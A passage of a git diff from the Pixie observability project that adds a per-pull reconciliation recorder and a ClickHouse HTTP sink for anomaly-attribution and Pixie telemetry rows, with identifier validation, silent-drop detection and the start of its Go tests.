+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+
+go_library(
+ name = "reconcile",
+ srcs = ["reconcile.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go
new file mode 100644
index 00000000000..3470ca92339
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go
@@ -0,0 +1,65 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package reconcile is the per-pull write-fidelity instrument for AE
+// (gated by ADAPTIVE_RECONCILE). It is a LEAF package — it imports none
+// of AE's other internal packages, so passthrough / controller / streaming
+// can all depend on it and the sink can implement it with no import cycle.
+//
+// Each data-plane pull records ONE Row: how many rows AE READ back from
+// Pixie for a (table, pod, window), and how many it WROTE to ClickHouse.
+// Reconciliation then localizes any loss to a single hop:
+// - read < px-direct PEM count → query/window/filter miss (hop R5)
+// - wrote < read → sink/batch drop (hop R6)
+// - CH distinct > read → re-pull duplication (C8, quantified)
+//
+// The records land in forensic_db.ae_reconcile (see the CH-backed Recorder
+// in the sink package). Best-effort: a failed reconcile write is logged,
+// never fatal, and never blocks the data path.
+package reconcile
+
+import (
+ "context"
+ "time"
+)
+
+// Row is one per-pull reconciliation record.
+type Row struct {
+ TS time.Time // when AE finished this pull; the CH-backed sink substitutes time.Now() if zero
+ Mode string // "filter" | "passthrough" | "streaming"
+ Table string // pixie table, e.g. "conn_stats"
+ Namespace string // target ns ("" for unfiltered passthrough/streaming)
+ Pod string // target pod ("" for unfiltered)
+ WinStart time.Time // PxL slice lower bound (time_ >= WinStart)
+ WinEnd time.Time // PxL slice upper bound (time_ < WinEnd)
+ ReadCount int64 // rows Pixie returned for this pull
+ WroteCount int64 // rows AE sent to CH (0 on write failure / empty)
+ WriteErr string // query or sink error, "" on success
+ Hostname string // node name
+}
+
+// Recorder persists reconciliation Rows. Implementations MUST be
+// best-effort and non-blocking-on-failure (the data path must never stall
+// because reconciliation logging failed).
+type Recorder interface {
+ Record(ctx context.Context, r Row)
+}
+
+// Nop is the disabled-flag Recorder. It drops every Row.
+type Nop struct{}
+
+// Record implements Recorder.
+func (Nop) Record(context.Context, Row) {}
diff --git a/src/vizier/services/adaptive_export/internal/script/script.go b/src/vizier/services/adaptive_export/internal/script/script.go
index 23005ec8851..b44fb7aeb0f 100644
--- a/src/vizier/services/adaptive_export/internal/script/script.go
+++ b/src/vizier/services/adaptive_export/internal/script/script.go
@@ -16,24 +16,9 @@
package script
-import (
- "fmt"
- "strings"
-)
-
-const (
- scriptPrefix = "ch-"
-)
-
-type ScriptConfig struct {
- ClusterName string
- ClusterId string
- CollectInterval int64
-}
-
type Script struct {
ScriptDefinition
- ScriptId string
+ ScriptID string
ClusterIds string
}
@@ -44,71 +29,3 @@ type ScriptDefinition struct {
Script string `yaml:"script"`
IsPreset bool `yaml:"-"`
}
-
-type ScriptActions struct {
- ToDelete []*Script
- ToUpdate []*Script
- ToCreate []*Script
-}
-
-func IsClickHouseScript(scriptName string) bool {
- return strings.HasPrefix(scriptName, scriptPrefix)
-}
-
-func IsScriptForCluster(scriptName, clusterName string) bool {
- return IsClickHouseScript(scriptName) && strings.HasSuffix(scriptName, "-"+clusterName)
-}
-
-func GetActions(scriptDefinitions []*ScriptDefinition, currentScripts []*Script, config ScriptConfig) ScriptActions {
- definitions := make(map[string]ScriptDefinition)
- for _, definition := range scriptDefinitions {
- scriptName := getScriptName(definition.Name, config.ClusterName)
- frequencyS := getInterval(definition, config)
- if frequencyS > 0 {
- definitions[scriptName] = ScriptDefinition{
- Name: scriptName,
- Description: definition.Description,
- FrequencyS: frequencyS,
- Script: templateScript(definition, config),
- }
- }
- }
- actions := ScriptActions{}
- for _, current := range currentScripts {
- if definition, present := definitions[current.Name]; present {
- if definition.Script != current.Script || definition.FrequencyS != current.FrequencyS || config.ClusterId != current.ClusterIds {
- actions.ToUpdate = append(actions.ToUpdate, &Script{
- ScriptDefinition: definition,
- ScriptId: current.ScriptId,
- ClusterIds: config.ClusterId,
- })
- }
- delete(definitions, current.Name)
- } else if IsClickHouseScript(current.Name) {
- actions.ToDelete = append(actions.ToDelete, current)
- }
- }
- for _, definition := range definitions {
- actions.ToCreate = append(actions.ToCreate, &Script{
- ScriptDefinition: definition,
- ClusterIds: config.ClusterId,
- })
- }
- return actions
-}
-
-func getScriptName(scriptName string, clusterName string) string {
- return fmt.Sprintf("%s%s-%s", scriptPrefix, scriptName, clusterName)
-}
-
-func getInterval(definition *ScriptDefinition, config ScriptConfig) int64 {
- if definition.FrequencyS == 0 {
- return config.CollectInterval
- }
- return definition.FrequencyS
-}
-
-func templateScript(definition *ScriptDefinition, config ScriptConfig) string {
- // Return script as-is without any processing
- return definition.Script
-}
diff --git a/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel
new file mode 100644
index 00000000000..277372892dd
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel
@@ -0,0 +1,50 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "sink",
+ srcs = [
+ "clickhouse.go",
+ "fastencode.go",
+ ],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/chhttp",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "sink_test",
+ srcs = [
+ "clickhouse_test.go",
+ "content_type_contract_test.go",
+ "encode_bench_test.go",
+ "fastencode_test.go",
+ ],
+ embed = [":sink"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go
new file mode 100644
index 00000000000..e5fc6130a71
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go
@@ -0,0 +1,501 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package sink writes operator-owned rows to ClickHouse over the HTTP
+// interface (default port 8123). It has two write surfaces:
+//
+// 1. forensic_db.adaptive_attribution — one row per arriving kubescape
+// anomaly. ReplacingMergeTree(t_end) on the table side collapses
+// re-inserts with the same (hostname, anomaly_hash) primary key
+// into the row with the largest t_end.
+//
+// 2. forensic_db.<table> — operator-pushed pixie observation rows
+// (rev-1 fan-out path, gated on ADAPTIVE_PUSH_PIXIE_ROWS=true).
+// Used when Pixie's cloud-side retention plugin can't reach an
+// in-cluster CH endpoint; the operator queries pixie itself and
+// writes the result with WritePixieRows.
+package sink
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "io"
+ "regexp"
+ "strconv"
+ "strings"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+)
+
+// pixieTableIdentRE accepts plain CH identifiers and dotted protobuf
+// extensions like `http2_messages.beta`. Used to gate `table` strings
+// before they're interpolated into the INSERT query.
+var pixieTableIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$`)
+
+// chIdentRE — strict CH identifier (no dots). Used to gate Database
+// (and any future single-segment identifier) against SQL injection
+// from env/config-driven values.
+var chIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)
+
+func validateTableIdentifier(t string) error { // nil when t matches pixieTableIdentRE
+ if pixieTableIdentRE.MatchString(t) {
+ return nil
+ }
+ return fmt.Errorf("sink: invalid table identifier %q", t)
+}
+
+// Config configures a ClickHouseHTTP sink.
+type Config struct {
+ Endpoint string // e.g. http://clickhouse:8123
+ Database string // defaults to "forensic_db"
+ Username string // optional basic auth
+ Password string // optional basic auth
+ Timeout time.Duration // per-write HTTP timeout; 0 → 30s
+}
+
+// AttributionRow is one row of forensic_db.adaptive_attribution.
+// All fields are required except LastRuleID; Namespace and Pod may be "".
+type AttributionRow struct {
+ AnomalyHash anomaly.AnomalyHash
+ Namespace string // may be empty
+ Pod string // may be empty
+ Comm string
+ PID uint64
+ Hostname string
+ TStart time.Time
+ TEnd time.Time
+ LastSeen time.Time
+ LastRuleID string
+ NAnomalies uint64
+}
+
+// ClickHouseHTTP is the production sink.
+type ClickHouseHTTP struct {
+ cfg Config
+ c *chhttp.Client
+}
+
+// New validates Config + returns a ready-to-use sink.
+func New(cfg Config) (*ClickHouseHTTP, error) {
+ if cfg.Database == "" {
+ cfg.Database = "forensic_db"
+ }
+ // Database is interpolated directly into INSERT/SELECT statements
+ // (used in Write, WritePixieRows, Record, QueryActive). Block
+ // injection via env/config-supplied values.
+ if !chIdentRE.MatchString(cfg.Database) {
+ return nil, fmt.Errorf("sink: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database)
+ }
+ // http.Client.Timeout enforces only when >0; a negative value
+ // would silently disable the deadline. Reject explicitly so the
+ // "0 → chhttp default" branch is the only zero-handling path.
+ if cfg.Timeout < 0 {
+ return nil, fmt.Errorf("sink: Timeout must be >= 0 (got %s)", cfg.Timeout)
+ }
+ c, err := chhttp.New(cfg.Endpoint, cfg.Username, cfg.Password, cfg.Timeout)
+ if err != nil {
+ return nil, fmt.Errorf("sink: %w", err)
+ }
+ cfg.Endpoint = c.Endpoint()
+ return &ClickHouseHTTP{cfg: cfg, c: c}, nil
+}
+
+// WritePixieRows POSTs a batch of arbitrary rows (one map per CH row,
+// keyed by column name) into forensic_db.<table> via FORMAT JSONEachRow.
+// Used by the operator's per-anomaly fan-out path that queries pixie
+// directly and pushes the resulting rows into CH (bypasses the cloud's
+// retention plugin, which can't reach an in-cluster CH endpoint).
+func (s *ClickHouseHTTP) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error {
+ if len(rows) == 0 {
+ return nil
+ }
+ if err := validateTableIdentifier(table); err != nil {
+ return err
+ }
+ // Pooled buffer (option 1) — controller fan-out + streaming flush
+ // call this on a tight cadence, so reusing the backing array across
+ // calls cuts the per-call B/op cost by ~70 % once the pool stabilises
+ // (the bench BenchmarkEncodePixieRowsFast_Pooled tracks the steady
+ // state). buf.Reset() preserves the cap on Put so the next caller
+ // gets a warm allocation.
+ buf := encodeBufPool.Get().(*bytes.Buffer)
+ buf.Reset()
+ defer func() {
+ // Avoid hoarding pathologically large buffers. The pixie batch
+ // upper bound is ~MaxBatchRows * ~900 B/row ≈ 1 MB; anything
+ // over 2 MB came from a one-off oversize batch and shouldn't
+ // stay in the pool eating heap.
+ if buf.Cap() > 2*1024*1024 {
+ return
+ }
+ encodeBufPool.Put(buf)
+ }()
+ // Fast path: known table → walk rows in schema column order, no
+ // reflect, no map-key sort. The fast encoder's CPU + alloc profile
+ // is ~3 % of the encoding/json path (AE benchmark suite); it's the
+ // hot path for every controller fan-out + streaming flush.
+ // errFastEncodeUnsupported falls back so an unexpected value type
+ // can't silently drop a row. ErrUnknownTable falls back so a new
+ // pixie table not yet in schema.sql still works (just slower).
+ if err := encodePixieRowsFast(buf, table, rows); err != nil {
+ if !errors.Is(err, errFastEncodeUnsupported) && !errors.Is(err, clickhouse.ErrUnknownTable) {
+ return fmt.Errorf("sink: fast encode %s: %w", table, err)
+ }
+ buf.Reset()
+ enc := json.NewEncoder(buf)
+ enc.SetEscapeHTML(false)
+ for _, r := range rows {
+ obj := make(map[string]any, len(r))
+ for k, v := range r {
+ obj[k] = normalisePixieValue(v)
+ }
+ if err := enc.Encode(obj); err != nil {
+ return fmt.Errorf("sink: encode pixie row for %s: %w", table, err)
+ }
+ }
+ }
+ identifier := table
+ if strings.Contains(table, ".") {
+ identifier = "`" + table + "`"
+ }
+ res, err := s.c.Insert(ctx,
+ fmt.Sprintf("INSERT INTO %s.%s FORMAT JSONEachRow", s.cfg.Database, identifier),
+ buf.Bytes(), chhttp.InsertOptions{FailLoud: true})
+ if err != nil {
+ return fmt.Errorf("sink: pixie POST %s: %w", table, err)
+ }
+ // DEBUG: ALWAYS log what CH says it wrote — temporary while we
+ // chase the pgsql_events silent-drop mystery. Only the first row's
+ // column names are logged (map order, so not stable between calls).
+ // NOTE(review): Info-level on every write; demote once resolved.
+ summary := res.Summary
+ var firstRowKeys []string
+ if len(rows) > 0 {
+ for k := range rows[0] {
+ firstRowKeys = append(firstRowKeys, k)
+ }
+ }
+ log.WithFields(log.Fields{
+ "table": table,
+ "rows_sent": len(rows),
+ "body_bytes": buf.Len(),
+ "ch_summary": summary,
+ "first_row_keys": strings.Join(firstRowKeys, ","),
+ }).Info("sink: pixie write completed")
+ // Detect the silent-drop class: CH returns 2xx but
+ // X-ClickHouse-Summary.written_rows < len(rows). Observed live on
+ // 2026-05-23T20:58Z (redis_events: rows_sent=1658, written_rows=0)
+ // — the operator reported success and the analyst saw the gap days
+ // later. Header absence is tolerated (older CH versions / proxies
+ // strip it); only an EXPLICIT written_rows below len(rows) counts.
+ if writeMismatch := summaryWroteFewerThan(summary, len(rows)); writeMismatch != nil {
+ return fmt.Errorf("sink: pixie write to %s reported %d rows_sent but CH summary written_rows=%d (silent drop): %s",
+ table, len(rows), writeMismatch.writtenRows, summary)
+ }
+ return nil
+}
+
+// summaryDelta holds the write counter extracted from ClickHouse's
+// X-ClickHouse-Summary response header.
+type summaryDelta struct {
+ writtenRows int64
+}
+
+// summaryWroteFewerThan inspects an X-ClickHouse-Summary header value.
+// It yields a summaryDelta only when the header is present, decodes as
+// JSON, and carries an integer written_rows strictly below rowsSent.
+// A missing, undecodable, or sufficient count yields nil (no loss signal).
+func summaryWroteFewerThan(summary string, rowsSent int) *summaryDelta {
+ if len(summary) == 0 {
+ return nil
+ }
+ var hdr struct {
+ WrittenRows json.Number `json:"written_rows"`
+ }
+ if json.Unmarshal([]byte(summary), &hdr) != nil {
+ return nil
+ }
+ if hdr.WrittenRows == "" {
+ return nil
+ }
+ n, convErr := hdr.WrittenRows.Int64()
+ if convErr != nil {
+ return nil
+ }
+ if n < int64(rowsSent) {
+ return &summaryDelta{writtenRows: n}
+ }
+ return nil
+}
+
+// normalisePixieValue coerces pxapi-emitted Go values into JSON-friendly
+// shapes ClickHouse parses cleanly. time.Time → UTC string in chTimeFmt
+// (CH's DateTime64 input format); []byte → string; everything else → as-is.
+func normalisePixieValue(v any) any {
+ switch x := v.(type) {
+ case time.Time:
+ return x.UTC().Format(chTimeFmt) // shared layout, same as Record's time columns
+ case []byte:
+ return string(x)
+ default:
+ return v
+ }
+}
+
+// Write sends a batch of AttributionRows to ClickHouse with one HTTP POST:
+// `INSERT INTO <Database>.adaptive_attribution FORMAT JSONEachRow`, body =
+// one JSON object per row. An empty batch returns nil without any request.
+func (s *ClickHouseHTTP) Write(ctx context.Context, rows []AttributionRow) error {
+ if len(rows) == 0 {
+ return nil
+ }
+ payload, encErr := encodeJSONEachRow(rows)
+ if encErr != nil {
+ return fmt.Errorf("sink: encode %d attribution rows: %w", len(rows), encErr)
+ }
+ stmt := fmt.Sprintf("INSERT INTO %s.adaptive_attribution FORMAT JSONEachRow", s.cfg.Database)
+ _, postErr := s.c.Insert(ctx, stmt, payload, chhttp.InsertOptions{FailLoud: true})
+ if postErr != nil {
+ return fmt.Errorf("sink: POST: %w", postErr)
+ }
+ return nil
+}
+
+// chTimeFmt is the ClickHouse DateTime64 literal format used for every
+// time column AE writes (see Write/encodeJSONEachRow and fastencode.go).
+const chTimeFmt = "2006-01-02 15:04:05.000000000"
+
+// Record implements reconcile.Recorder: it inserts ONE per-pull
+// reconciliation row into <Database>.ae_reconcile, stamping time.Now()
+// when r.TS is zero. Best-effort by contract — any failure is logged at
+// warn and swallowed; the insert itself is capped at recordTimeout.
+func (s *ClickHouseHTTP) Record(ctx context.Context, r reconcile.Row) {
+ ts := r.TS
+ if ts.IsZero() {
+ ts = time.Now()
+ }
+ obj := map[string]any{
+ "ts": ts.UTC().Format(chTimeFmt),
+ "mode": r.Mode,
+ "table_name": r.Table,
+ "namespace": r.Namespace,
+ "pod": r.Pod,
+ "win_start": r.WinStart.UTC().Format(chTimeFmt),
+ "win_end": r.WinEnd.UTC().Format(chTimeFmt),
+ "read_count": r.ReadCount,
+ "wrote_count": r.WroteCount,
+ "write_err": r.WriteErr,
+ "hostname": r.Hostname,
+ }
+ body, err := json.Marshal(obj)
+ if err != nil {
+ log.WithError(err).Warn("reconcile: marshal row")
+ return
+ }
+ // Cap Record at recordTimeout regardless of the caller's ctx —
+ // scanner/passthrough/controller call this inline on hot paths, so a
+ // stalled CH must not pin the pull loop on the shared 30s sink
+ // timeout (CodeRabbit r3426923299). 2s is well above CH's typical
+ // single-row INSERT roundtrip (~50ms in steady state) and below the
+ // pull loop's minimum tick interval.
+ rctx, cancel := context.WithTimeout(ctx, recordTimeout)
+ defer cancel()
+ if _, err := s.c.Insert(rctx,
+ fmt.Sprintf("INSERT INTO %s.ae_reconcile FORMAT JSONEachRow", s.cfg.Database),
+ body, chhttp.InsertOptions{}); err != nil {
+ log.WithError(err).Warn("reconcile: CH rejected ae_reconcile insert")
+ }
+}
+
+// recordTimeout caps how long Record can block the caller's hot path.
+const recordTimeout = 2 * time.Second
+
+// QueryActive fetches all attribution rows on this hostname whose t_end
+// is still in the future. Used by the operator at boot to rehydrate
+// the in-memory active set after a pod crash. Returns rows ordered
+// by anomaly_hash so the caller's set is deterministic.
+func (s *ClickHouseHTTP) QueryActive(ctx context.Context, hostname string) ([]AttributionRow, error) {
+ if hostname == "" {
+ return nil, fmt.Errorf("sink: QueryActive requires hostname")
+ }
+ // `FINAL` collapses ReplacingMergeTree to the row with the largest
+ // t_end (because the engine's version column is t_end).
+ // hostname is embedded as a single-quoted literal via quoteCH,
+ // which backslash-escapes `\` and `'`.
+ sql := fmt.Sprintf(
+ "SELECT anomaly_hash, namespace, pod, comm, pid, hostname, "+
+ "toUnixTimestamp64Nano(t_start) AS t_start_ns, "+
+ "toUnixTimestamp64Nano(t_end) AS t_end_ns, "+
+ "toUnixTimestamp64Nano(last_seen) AS last_seen_ns, "+
+ "last_rule_id, n_anomalies "+
+ "FROM %s.adaptive_attribution FINAL "+
+ "WHERE hostname = %s AND t_end > now64(9) "+
+ "ORDER BY anomaly_hash FORMAT JSONEachRow",
+ s.cfg.Database, quoteCH(hostname))
+ body, err := s.c.QueryStream(ctx, sql)
+ if err != nil {
+ return nil, fmt.Errorf("sink: QueryActive: %w", err)
+ }
+ defer body.Close()
+ // Stream the response line-by-line so the buffer is bounded by
+ // parseActiveRowsStream's per-line cap, not by the active-set size.
+ return parseActiveRowsStream(body)
+}
+
+// chLiteralEscaper escapes a string for ClickHouse single-quoted literals:
+// a backslash becomes `\\` and a single quote becomes `\'`. It is a
+// package-level var so quoteCH reuses one Replacer rather than building one per call.
+var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+// quoteCH returns s as a single-quoted ClickHouse literal, escaped via chLiteralEscaper.
+func quoteCH(s string) string {
+ return "'" + chLiteralEscaper.Replace(s) + "'"
+}
+
+func encodeJSONEachRow(rows []AttributionRow) ([]byte, error) { // JSONEachRow body: one object per line
+ var buf bytes.Buffer
+ enc := json.NewEncoder(&buf)
+ enc.SetEscapeHTML(false) // keep <, > and & literal in the payload
+ for _, r := range rows {
+ obj := map[string]any{
+ "anomaly_hash": string(r.AnomalyHash),
+ "namespace": r.Namespace,
+ "pod": r.Pod,
+ "comm": r.Comm,
+ "pid": r.PID,
+ "hostname": r.Hostname,
+ "t_start": r.TStart.UTC().Format(chTimeFmt), // shared DateTime64 layout
+ "t_end": r.TEnd.UTC().Format(chTimeFmt),
+ "last_seen": r.LastSeen.UTC().Format(chTimeFmt),
+ "last_rule_id": r.LastRuleID,
+ "n_anomalies": r.NAnomalies,
+ }
+ if err := enc.Encode(obj); err != nil {
+ return nil, err
+ }
+ }
+ return buf.Bytes(), nil
+}
+
+// activeWireRow mirrors the JSONEachRow shape emitted by QueryActive.
+// json.RawMessage on the 64-bit integer fields (pid, *_ns, n_anomalies)
+// lets us tolerate CH's two wire formats (`12345` and `"12345"`).
+type activeWireRow struct {
+ AnomalyHash string `json:"anomaly_hash"`
+ Namespace string `json:"namespace"`
+ Pod string `json:"pod"`
+ Comm string `json:"comm"`
+ PID json.RawMessage `json:"pid"`
+ Hostname string `json:"hostname"`
+ TStartNs json.RawMessage `json:"t_start_ns"`
+ TEndNs json.RawMessage `json:"t_end_ns"`
+ LastSeenNs json.RawMessage `json:"last_seen_ns"`
+ LastRuleID string `json:"last_rule_id"`
+ NAnomalies json.RawMessage `json:"n_anomalies"`
+}
+
+// parseActiveRowsStream ingests JSONEachRow output from QueryActive
+// directly from a reader so the per-call buffer is bounded by
+// maxActiveRowBytes (per row) rather than by the entire active
+// set. Mirrors trigger.parseJSONEachRow's streaming posture.
+func parseActiveRowsStream(r io.Reader) ([]AttributionRow, error) {
+ const maxActiveRowBytes = 1 << 20 // 1 MiB per JSONEachRow line
+ scanner := bufio.NewScanner(r)
+ scanner.Buffer(make([]byte, 0, 64*1024), maxActiveRowBytes)
+ var out []AttributionRow
+ for scanner.Scan() {
+ line := bytes.TrimSpace(scanner.Bytes())
+ if len(line) == 0 {
+ continue
+ }
+ row, err := parseActiveRowLine(line)
+ if err != nil {
+ return nil, err
+ }
+ out = append(out, row)
+ }
+ if err := scanner.Err(); err != nil { // includes bufio.ErrTooLong for a line over the cap
+ return nil, fmt.Errorf("sink: QueryActive scan: %w", err)
+ }
+ return out, nil
+}
+
+// parseActiveRowLine turns one JSONEachRow line into an AttributionRow.
+// parseActiveRowsStream calls it per line; tests reach it through
+// parseActiveRows.
+func parseActiveRowLine(line []byte) (AttributionRow, error) {
+ var wire activeWireRow
+ if decodeErr := json.Unmarshal(line, &wire); decodeErr != nil {
+ // The raw line may hold CH row payloads, so only its length is
+ // reported — never the bytes themselves.
+ return AttributionRow{}, fmt.Errorf("sink: parse active row (%d bytes): %w", len(line), decodeErr)
+ }
+ startNs, errStart := nsFromRaw(wire.TStartNs)
+ endNs, errEnd := nsFromRaw(wire.TEndNs)
+ seenNs, errSeen := nsFromRaw(wire.LastSeenNs)
+ pid, errPID := uintFromRaw(wire.PID)
+ count, errCount := uintFromRaw(wire.NAnomalies)
+ if errStart != nil || errEnd != nil || errSeen != nil || errPID != nil || errCount != nil {
+ return AttributionRow{}, fmt.Errorf("sink: parse uint64 fields: t_start=%v t_end=%v last_seen=%v pid=%v n_anomalies=%v", errStart, errEnd, errSeen, errPID, errCount)
+ }
+ return AttributionRow{
+ AnomalyHash: anomaly.AnomalyHash(wire.AnomalyHash),
+ Hostname: wire.Hostname,
+ Namespace: wire.Namespace,
+ Pod: wire.Pod,
+ Comm: wire.Comm,
+ PID: pid,
+ NAnomalies: count,
+ LastRuleID: wire.LastRuleID,
+ TStart: time.Unix(0, startNs).UTC(),
+ TEnd: time.Unix(0, endNs).UTC(),
+ LastSeen: time.Unix(0, seenNs).UTC(),
+ }, nil
+}
+
+// parseActiveRows is the byte-slice convenience wrapper around
+// parseActiveRowsStream — kept for tests and e2e fixtures that have
+// already buffered the full response.
+func parseActiveRows(body []byte) ([]AttributionRow, error) {
+ return parseActiveRowsStream(bytes.NewReader(body))
+}
+
+// nsFromRaw reads a 64-bit integer that CH may send bare (`12345`) or
+// quoted (`"12345"`) and returns it as int64; used for the *_ns columns.
+func nsFromRaw(raw json.RawMessage) (int64, error) {
+ trimmed := strings.TrimSpace(string(raw))
+ digits := strings.Trim(trimmed, `"`)
+ // Base 10, 64 bits: the nanosecond values go straight into time.Unix(0, ns).
+ return strconv.ParseInt(digits, 10, 64)
+}
+
+// uintFromRaw is nsFromRaw's unsigned sibling: it accepts the same bare or
+// quoted digits but parses them as uint64 (used for pid and n_anomalies).
+func uintFromRaw(raw json.RawMessage) (uint64, error) {
+ digits := strings.Trim(strings.TrimSpace(string(raw)), `"`)
+ parsed, err := strconv.ParseUint(digits, 10, 64)
+ return parsed, err
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go
new file mode 100644
index 00000000000..0eb42adcc76
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go
@@ -0,0 +1,588 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bytes"
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// canonicalAttribution returns the fixed redis attribution row shared by the
+// sink tests: a ten-minute window centred on LastSeen, one anomaly, R1005.
+func canonicalAttribution() AttributionRow {
+	seen := time.Unix(0, 1744477360303026359).UTC()
+	target := anomaly.Target{PID: 106040, Comm: "redis-server", Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis"}
+	return AttributionRow{
+		AnomalyHash: anomaly.Hash(target),
+		Namespace:   "redis",
+		Pod:         "redis-578d5dc9bd-kjj78",
+		Comm:        "redis-server",
+		PID:         106040,
+		Hostname:    "node-1",
+		TStart:      seen.Add(-5 * time.Minute),
+		TEnd:        seen.Add(5 * time.Minute),
+		LastSeen:    seen,
+		LastRuleID:  "R1005",
+		NAnomalies:  1,
+	}
+}
+
+// TestSink_Write_PostsCorrectQueryAndBody — Write must INSERT into the
+// attribution table and carry every attribution field in the JSON body.
+func TestSink_Write_PostsCorrectQueryAndBody(t *testing.T) {
+	var gotQuery, gotBody string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotQuery = r.URL.Query().Get("query") // the SQL statement rides in ?query=
+		b, _ := io.ReadAll(r.Body)
+		gotBody = string(b)
+		w.WriteHeader(200)
+	}))
+	defer srv.Close()
+
+	s, err := New(Config{Endpoint: srv.URL})
+	if err != nil {
+		t.Fatalf("New: %v", err)
+	}
+	row := canonicalAttribution()
+	if err := s.Write(context.Background(), []AttributionRow{row}); err != nil {
+		t.Fatalf("Write: %v", err)
+	}
+	want := "INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow"
+	if gotQuery != want {
+		t.Fatalf("query = %q, want %q", gotQuery, want)
+	}
+	for _, needle := range []string{ // substring checks: field order in the body is not pinned
+		`"anomaly_hash":"` + string(row.AnomalyHash) + `"`,
+		`"namespace":"redis"`,
+		`"pod":"redis-578d5dc9bd-kjj78"`,
+		`"comm":"redis-server"`,
+		`"pid":106040`,
+		`"hostname":"node-1"`,
+		`"last_rule_id":"R1005"`,
+		`"n_anomalies":1`,
+	} {
+		if !strings.Contains(gotBody, needle) {
